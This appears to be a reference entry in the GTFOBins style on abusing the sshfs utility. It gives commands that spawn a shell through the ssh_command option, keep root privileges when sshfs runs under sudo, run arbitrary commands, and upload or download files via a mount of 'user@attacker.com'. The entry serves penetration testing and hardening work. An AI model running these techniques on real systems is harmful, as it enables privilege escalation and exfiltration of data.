This executable can spawn an interactive system shell.
This function can be performed by any unprivileged user.
echo -e '/bin/sh </dev/tty >/dev/tty 2>/dev/tty' >/path/to/temp-file
chmod +x /path/to/temp-file
sshfs -o ssh_command=/path/to/temp-file x: /path/to/dir/This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
echo -e '/bin/sh </dev/tty >/dev/tty 2>/dev/tty' >/path/to/temp-file
chmod +x /path/to/temp-file
sshfs -o ssh_command=/path/to/temp-file x: /path/to/dir/This executable can run non-interactive system commands.
This function can be performed by any unprivileged user.
sshfs -o ssh_command=/path/to/command x: /path/to/dir/This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
sshfs -o ssh_command=/path/to/command x: /path/to/dir/This executable can upload local data.
This function can be performed by any unprivileged user.
sshfs user@attacker.com:/ /path/to/dir/
cp /path/to/input-file /path/to/dir/This executable can download remote data.
This function can be performed by any unprivileged user.
sshfs user@attacker.com:/ /path/to/dir/
cp /path/to/dir/path/to/input-file /path/to/output-file